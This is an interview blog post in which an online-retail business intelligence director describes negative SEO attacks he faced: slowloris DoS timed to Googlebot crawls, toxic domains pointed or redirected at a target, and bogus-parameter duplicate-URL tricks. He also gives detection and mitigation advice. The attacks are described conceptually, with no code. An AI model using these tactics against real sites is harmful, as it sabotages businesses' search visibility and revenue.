During our Clarity World Tour event in Seattle, I had the privilege of talking with Ted Kubaitis from GreaterGood.com. Of the many great conversations I've had around the world, this one stood out the most. Ted taught me a lot about negative SEO attacks and how to detect them that I'd never even considered before.
What is Negative SEO?
Negative SEO is a strategy employed by sites to negatively affect their competitors' sites by influencing search engine signals to or from those sites. When most SEOs think about Negative SEO, they generally only consider the buying of bad backlinks to competitor sites. That's what I've thought for years. But apparently, Negative SEO is a much more diverse skillset and has many other tactics that can be even more insidious than buying bad links.
That's why I had to follow up on my conversation with Ted and sit at his feet a while to learn what he has learned.
The Interview
KG: First of all, thank you so much for your willingness to share what you've learned with us today.
TK: You are very welcome.
KG: Are you an SEO by trade?
TK: It is part of what I do. Today it is probably 20% of my day. I am currently the Director of Business Intelligence for a large online retailer. I am both a software engineer and marketer. In the past, I have patented a technology and founded a software company in the area of competitive and business intelligence. I have worn just about every hat there is to wear in an online business.
KG: For the Googlers who deny the influence of Negative SEO, is Negative SEO real, and does it impact sites?
TK: It's real. I think the deniers suffer from sample bias. Since they haven't been targeted, then the threat must be minimal. But the truth is that it is an arms race and because there is a lot of money on the line and there are competitors outside of your legal jurisdiction and in many cases there aren't even laws that are applicable to the kinds of attacks, it can become very serious very fast.
KG: How did you detect the first negative SEO attack on your site?
TK: I first encountered negative SEO by accident of course! I used to be in the "negative SEO isn't real" camp. I sit in the engineering bullpen at my company, which is all open-air. There are no offices or cubes on this team. This allows everyone to be aware of all of the issues of the day automatically. I overheard the network administrator battling with very weak denial of service attacks on our servers.
### GEEK SPEAK – TECHNICAL DETAILS WARNING – optionally skip to below ###
The specific type of attack my network administrator was battling is called a "slow loris" attack.
Slow Loris Defined
Slowloris is a piece of software written by Robert "RSnake" Hansen which allows a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports.
Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent HTTP headers, adding to—but never completing—the request. Affected servers will keep these connections open, filling their maximum concurrent connection pool, eventually denying additional connection attempts from clients.
Source: Wikipedia
### END GEEK SPEAK ###
The attacks made little sense. We would detect them and block them usually within an hour or two, and they would keep coming back every two to three weeks. This went on for months and possibly even years. We're not sure when they started.
We didn't understand the motivation of these attacks. We could easily counter them once they were detected. Why was someone working so persistently over time to do this when we thwart it so quickly when it happens?
Months went by. I was in an executive meeting trying to explain the bizarre volatility in SEO revenue. Keep in mind I didn't believe in negative SEO at this point. In that meeting I got chills. I had a notion I just couldn't shake. After the meeting, I put the graph of the slow loris attacks on top of the graph of SEO revenue, and every large drop in SEO revenue ALWAYS followed a slow loris attack. From that day forward I knew negative SEO was very real and very different from what I and everyone else thought negative SEO was. This was a VERY effective negative SEO attack and it had absolutely nothing to do with backlinks.
### GEEK SPEAK ###
I spent the next several weeks learning everything I could about this negative SEO attack. I learned how it worked. In a nutshell, our attacker was waiting for an indication that googlebot was crawling our site, then they would launch the attack so our web server would return 500 errors to everyone including Googlebot. Googlebot, at the time, would remove the pages that returned an error response from the search results. Googlebot wouldn't retest the pages for days (This isn't the case today... Google retests within hours now, but it was the case at the time). Then to make things even worse, once googlebot found that the pages were working again they would re-appear several places lower in the search results and stay like that for about 2 weeks before recovering to their original rankings.
### END GEEK SPEAK ###
These attacks that we thought were unsuccessful and feeble were totally the opposite. They were successful and devastating. They had lasting effects and the timing of the attacks was keeping us pinned down.
"From that day forward I knew negative SEO was very real and very different from what I and everyone else thought negative SEO was. This was a VERY effective negative SEO attack and it had absolutely nothing to do with backlinks."
If you were just watching rankings then the effects just look like normal everyday Google dance. No one cares that one week a page went down 2 spots and then a week or two later comes back up. We have 400K pages across 20 websites, and most of those websites shared servers. Webmaster tools doesn't let you see aggregate effects across sites. If I wasn't attributing and tracking SEO revenue across all sites, which many SEOs object to, this would have continued undetected.
So now we knew the attack was real, and we knew how it worked. So how do we stop them?
For the attack to be effective the attacker needed to coordinate his attack to coincide with Googlebot's crawl of the website. How can they do this? There are four ways I can think of:
- Monitor the google cache and when a cache date is updated you know googlebot is crawling.
- Analyze the cache dates and estimate when Googlebot will come back
- Cross-site scripting to see visiting User agents
- Attack often and hope for the best
I believed our attacker was clever, and they were probably doing #1.
I countered our attacker by putting a NOARCHIVE tag on all of our pages. This prevents Google from showing the Cached link for a page. This would stop the attacker from easily monitoring our cache dates.
The attacks stopped for about 4 months following that change. We thought we had won, but we were wrong.
In late Q3 2014 we were hit hard by a single, extremely-precise attack. Then our attacker went dormant. The attacker had his capability back. The attacker knew we were on to them. We knew he was picking his timing more carefully and more strategically. It was the second time something in SEO has given me chills. I had a notion I couldn't shake. Like most online retailers we do most of our sales in Q4. The notion I couldn't shake was that the attacker was lying in wait for Black Friday. One of these attacks the week before Black Friday would destroy our top SEO weeks for the year.
We scrambled to figure out how they were timing their attacks. We failed. The week before Black Friday we were hit harder then we were ever hit before. We lost 60-70% of our SEO revenue for the month. I was devastated.
The company officially accepted that the attacks were amounting to significant losses and were going to continue. We invested several hundred thousand dollars in security appliances that automatically detect and block hundreds of different attacks in real time.
"Following each and every soul-crushing SEO revenue event. I had to pour through the logs and testimony of everything to try and make sense of things."
It took six months to get all the websites protected by the new firewalls and to get all the URLs properly remapped. We had finally won a battle but at a pretty hefty price in time and money. I am very happy to say that this year we have seen high double-digit growth in SEO revenue. It is largely due to stopping the negative SEO attacks.
KG: What are some of the tactics you've seen used for Negative SEO that most people haven't heard of or would never even consider?
TK: The attack I just described I call a "Googlebot Interruption Attack". Negative SEO is so new these attacks probably don't have official names yet.
Another attack is when a black hat takes a toxic domain name that has been penalized into the ground and then points the DNS to your website. Some of those penalties appear to carry over at least for a short while. The worst is when the attacker has a lot of these toxic domains and points them all at once at your website.
A similar attack to that is when they redirect the URLs from the toxic sites to your URLs. This has the effect of giving a website a whole collection of toxic backlinks in a way where the URLs still work. What is scary about this is the attack can recycle the investment in toxic links and change targets quickly.
Another attack is to target a page that is missing a canonical tag by submitting a version of the URL that works but Google has never seen, like adding a bogus URL parameter or anchor text. Then you link build to the bogus URL until it outranks the original. The original will fall out of the results as a lower PR duplicate. Then you pull the backlinks to the bogus URL, and you have effectively taken a page out of the Google index until they recalculate PR again. Just put a canonical tag on every page and you can protect yourself from this one.
Another attack just requires a lot of domains (they don't have to be toxic) that are indexed and visited by a LOT of bots. The attacker in many cases will point hundreds of these domains at a single website and use the collective of bot activity as a denial of service against the website.
"Your only hope is to accurately attribute SEO revenue and monitor it regularly."
Everyone knows about buying spammy backlinks. I'm certain there are more attack vectors. It is limited to the creativity of the bad guys, and bad guys can be pretty creative. Honestly I'm scared to keep looking. It takes a serious SEO revenue event for me to muster up and dig into this dark pit. I am constantly afraid of what I might find next having run the gauntlet and paid the price already.
KG: Where do you generally discover the indicators for these attacks? What should SEOs be looking for?
TK: A thousands SEOs are going to argue with me. Your only hope is to accurately attribute SEO revenue and monitor it regularly. Conversions are good, but if you're looking for strong signal on the health of your SEO then revenue is better. Revenue implies good indexation, rankings, traffic, and conversions all in one very sensitive gage. Conversions are good too, but the needle doesn't move as much, making it harder to see the signals.
Secondly... sit next to your engineers. The issues they encounter are directly relevant to the effectiveness of your SEO. The frantic firefighting of the network administrator is one of the best indicators. Log serious events and plot them with revenue and other KPIs
Third... logs. The crawl error logs in GWT tell you about the issues googlebot encounters.
- Lots of 500 errors: might be googlebot interruption
- Lots of 404s might be toxic domain redirection
- Lots of URLs in errors or duplicate content that make no sense for your website...
- In general hacking attempts often appear in web logs.
KG: How did you learn about how to detect these attacks?
TK: The hard way. Following each and every soul-crushing SEO revenue event, I had to pour through the logs and testimony of everything to try and make sense of things. Not every SEO event was an attack. In many cases the events were caused by errors deployed on our websites. Or the marketing team installed a new problematic tracking pixel service. Several times the owners bought domains and pointed them at our sites not knowing that the previous owners had made them permanently toxic. As an SEO, you need to detect and address these as well:Revenue, Logs, and general awareness of daily events was critical to early detection.
KG: Would you suggest that SEO's spend more time on the blackhat forums as part of their continuing education?
TK: Yes and no. If you need help understanding an attack then, yes. If you are trusting of strangers in general, then you should stay away as these forums often exploit the trusting. However, when I went to the reader base of many popular SEO forums and blogs, I was ridiculed and called a liar for asking for help with a problem most SEOs had never seen or heard of before. It was all too common that the peanut gallery of SEO professionals would criticize me for not having links and kept saying I had the burden of proof. These were supposedly members of the professional SEO community, but it was just a political flame war. The black hat community actually helped me research the kinds of attacks I was facing, explained how they worked and suggested ideas for countering them. Google and the SEO community in general were very unsupportive. I'm going to remember that for a very long time.
"Google has a fundamental problem. Penalties are easily weaponized. If Google was rewarding the good then we’d want people to exploit that."
KG: How pervasive would you say these attacks are? How many attacks has your site experienced?
TK: For some reason we are a big target. It is probably because so many of our products compete with similar products that are often affiliate offerings. If you are an online retailer that does a lot of sales seasonally, you need to be on the look out. The big threat is solved for my sites for now, but the vast majority of retail sites are unprotected, and many of them aren't in a position to solve the issue the way we did.
Over the years I'd say we've been attacked hundreds of times but it wasn't until 2014 that we became aware of it, and there were a lot of random events that helped that happen. There is "security by obscurity" for most websites. You have to be a worthy enough target to get this kind of attention.
KG: How do you approach Negative SEO mitigation? For example, how would you mitigate the use of false parameters on your site?
TK: Detection is paramount. You can't mitigate problems if you are unaware of them. For false parameters specifically there are several options... you can use canonical tags on every page, which I highly recommend. You can also use URL rewriting to enforce very strict URL formatting. But if you aren't looking at the logs and if you aren't looking at your search result URLs closely then you wont even know about the issue.
KG: What types of negative SEO detection should platforms be doing that they aren't?
TK: Detailed revenue attribution is the big one. Seeing that the losses only come from Google is an important signal. For me, SEO revenue comes from dozens of sources. Search Engines, like Google, Bing, Excite, AOL, Yahoo, etc... Syndicated Search like laptop and ISP start pages and meta search engines, Safe Search AVG, McAfee, etc... and finally my SEO experiments.
Having the revenue attribution lets me know the revenue loss only occurred on Google this time so it can't be consumer behavior like Spring Break because the drop would have been across the board if consumers just went on holiday.
Also keep an eye on 500 Errors, 404 Errors, Mystifying URLs in logs or in search results
If you can invent one a "Network Administrator Frustration Meter" would also be high on my list.
KG: Do you think machine learning will eventually negate manual algorithmic manipulation? Or will we always have to be vigilant?
TK: Google has a fundamental problem. Penalties are easily weaponized. If Google was rewarding the good then we'd want people to exploit that. Sure win more accredited awards, get more accredited press, be publicly traded, better yet have a favorable PE ratio, be in good standing with your lenders and customers and suppliers... Go ahead and game that system if you can.
Unfortunately Google would rather play bad site Whack-a-mole. I don't know why. It seems contrary to being a good community member in my opinion.
In terms of machine learning... It's an arms race. Many of us already employ systems or processes of making our sites respond to what works well in Google. I'd expect the arms race to continue.
" If something is not right, you need to be very proactive and diligent about trying to find the source, and don’t let naysayers stop you from finding out what is going on."
KG: Any last bit of advice for SEOs?
TK: Change a little. Measure a lot. You can prove it for yourself so why aren't you doing that? The only results that count are the reproducible kind. If you are afraid to track SEO revenue because it wont justify your cost then have the discussion about the value of direction-setting so one day it will. SEO is a vector, meaning it is a magnitude and a direction. As far as tomorrow is concerned the direction is more important. Go Seahawks!
TL;DR Summary
Success for a Negative SEO attack is not an instant, catastrophic event. Such an event would be easily detectable and addressed. Rather, success for the blackhat SEO in this endeavor is creating many small holes, creating little trickles of rank loss, lost traffic, and lost revenue, not easily detected by normal means. From the slow loris attacks, to falsified parameters, and, yes, to buying bad links, the blackhat SEO has more than one tool in their toolbox, so sites should have more than one approach to measuring SEO success and monitoring for site issues. In this interview Ted Kubaitis outlined his struggles against negative SEO attacks, how he monitors for it now, and how he mitigated those attacks.
Kubaitis recommends:
- Develop a close relationship with your sys admins and network administrators, and monitor their challenges to look for potential attacks
- Review your crawl error logs as well as your server log files for any anomalous patterns
- Monitor analytics to look for any non-standard parameters receiving traffic
- Use canonical tags and have your site enforce strict URL rules to avoid having extraneous pages created by would-be blackhats
- Do your research when something doesn't make sense
Ted Kubaitis: Currently the Director of Business Intelligence for GreaterGood.com. Ted is both an engineer and a marketer whose web experience goes back to when using NCSA Mosaic required a signed NDA. In the past Ted has patented a technology and founded a software company in the area of competitive and business intelligence.
2 Comments
Click here to read/write comments